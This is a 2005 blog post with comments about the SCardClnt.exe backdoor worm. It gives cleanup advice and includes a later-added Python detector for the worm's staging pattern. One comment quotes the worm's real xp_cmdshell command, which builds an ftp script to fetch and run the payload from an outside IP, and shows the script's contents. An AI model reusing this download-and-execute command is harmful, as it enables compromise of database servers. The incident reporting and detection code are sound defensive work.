Wednesday, April 13, 2005

Possible Worm getting around - SCardClnt.exe

Tech Support Guy Forums - help with hjt log please..: "Scardsvr.exe is a legitimate Windows/Microsoft file. SCardClnt.exe isn't.

If the file was missing, then HJT would say so. But it doesn't say '(file missing)' so therefore it MUST be there!

Make sure you can view hidden and system files, as per my original instructions:

Go to: Control Panel > Folder Options > View tab:
Checkmark 'show hidden files'
Uncheck 'hide extensions for known file types'
Uncheck 'Hide protected operating system files'
OK everything and close Folder Options.

Note, those are the WinXP instructions, but I assume it's similar for Win2k?

Open the 'C:\WinNT\System32' folder
Go to the 'View' menu at the top and select: Arrange Icons by > Type
Now scroll down until you see all the .exe files
Find SCARDCLNT.EXE
Right click it and select 'properties'"

Disable all rights on the 'Security' tab

It may also be installed as a service.

This is a backdoor worm that is getting around. I am trying to get rid of it now. It spreads via network shares (much as ClearCase does). That backdoor payload is a variant of "CODBOT" (Codbot.Z).

4 comments:

Anonymous said...

In my case, it spreads via SQL Server. See a post I sent on a SQL forum:


Hi,

Since I installed a firewall on my machine, it regularly detects unexpected ftp sessions.

Thanks to a process explorer, I remarked that ftp is launched from a (hidden) cmd.exe, itself launched by sql.exe (for your info, the ftp command line is: "ftp -n -s:???.txt" where ???.txt is a text file in \system32\).


In SQL Enterprise Manager, I see one suspect process. Process details :

EXEC master..xp_cmdshell 'echo open 81.244.123.174 6220 >> ntp.txt &echo user ntpbxu ntpbxu >> ntp.txt &echo get SCardClnt.exe >> ntp.txt &echo quit >> ntp.txt &ftp -n -s:ntp.txt'


What SQL subsystem is able to launch such a process? A stored procedure? A trigger? (FYI, SQLAgent is not running.) How can I prevent this from occurring? Do I have to reinstall SQL Server?

Thank you for your help,

François


Note - contents of the textfile in \system32\:

open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit
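Detection logic for the staging pattern described in this comment, as an added example that is not from the original post or the forum thread: it reassembles the ftp script from the chained `echo ... >> file` appends in an xp_cmdshell command string and parses the resulting open/user/get lines, which is the same layout as the ntp.txt contents shown above. The sample command lines are constructed here from the values quoted on this page.

```python
import re
from typing import Optional

# Constructed samples: the xp_cmdshell string quoted in the comment, plus a benign one.
SAMPLE_CMDLINES = [
    "EXEC master..xp_cmdshell 'echo open 81.244.123.174 6220 >> ntp.txt &echo user ntpbxu ntpbxu >> ntp.txt &echo get SCardClnt.exe >> ntp.txt &echo quit >> ntp.txt &ftp -n -s:ntp.txt'",
    "EXEC master..xp_cmdshell 'dir C:\\'",
]

# "echo <text> >> <file>" fragments that build an ftp script one line at a time.
ECHO_APPEND = re.compile(r"echo\s+(.*?)\s*>>\s*(\S+)")
# ftp run non-interactively from a script file (-n: no auto-login, -s:<file>: script).
FTP_SCRIPT = re.compile(r"\bftp\s+(?:-\S+\s+)*-s:(\S+)")

def parse_ftp_script(lines):
    """Parse ftp script lines (open/user/get/quit) into a dict of indicators."""
    info = {"host": None, "port": None, "user": None, "password": None, "files": []}
    for raw in lines:
        parts = raw.strip().split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:
            info["host"] = args[0]
            info["port"] = int(args[1]) if len(args) > 1 else 21  # ftp default port
        elif verb == "user" and args:
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
        elif verb == "get" and args:
            info["files"].append(args[0])  # remote file being fetched
    return info

def staged_ftp_download(cmdline: str) -> Optional[dict]:
    """Return parsed indicators if cmdline stages an ftp script via echo >> and runs it."""
    m = FTP_SCRIPT.search(cmdline)
    if not m:
        return None
    script = m.group(1).strip("'\"")
    # Reassemble the script from the appends that target that same file, in order.
    lines = [text for text, target in ECHO_APPEND.findall(cmdline) if target == script]
    if not lines:
        return None
    result = parse_ftp_script(lines)
    result["script"] = script
    return result

def scan(cmdlines):
    """Run the detector over a list of command strings and keep the hits."""
    return [hit for hit in map(staged_ftp_download, cmdlines) if hit]
```

Feed it command strings recovered from SQL Server process details or command-line auditing; each hit carries the host, port, credentials and fetched file to block and hunt for.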

Boston Bala said...

Updated virus Information here: SCardClnt.exe: W32/Codbot-Gen

Boston Bala said...

Lost in Media: WORM_RANDEX.BN - Description and solution

Anonymous said...

Please help me out here. I had the ScardClnt.exe thing; I think I fixed that, I am not sure at all, but now I've had some red virus attacks that my antivirus (Trend Micro) blocks, but it shuts down the internet. And now my antivirus isn't operational, it is shut down completely, and when I open it, it doesn't do anything! Also I can't open the task manager nor execute netstat -b; it opens and it closes at the moment. My computer is incredibly slow, I can't open anything, it takes like 5 minutes to open a folder. Do you know what's happening? I post it here because it has something to do with that. Thanks, if you can help me write to happyzaza@hotmail.com, because I don't think this will let me visit this again. HELP!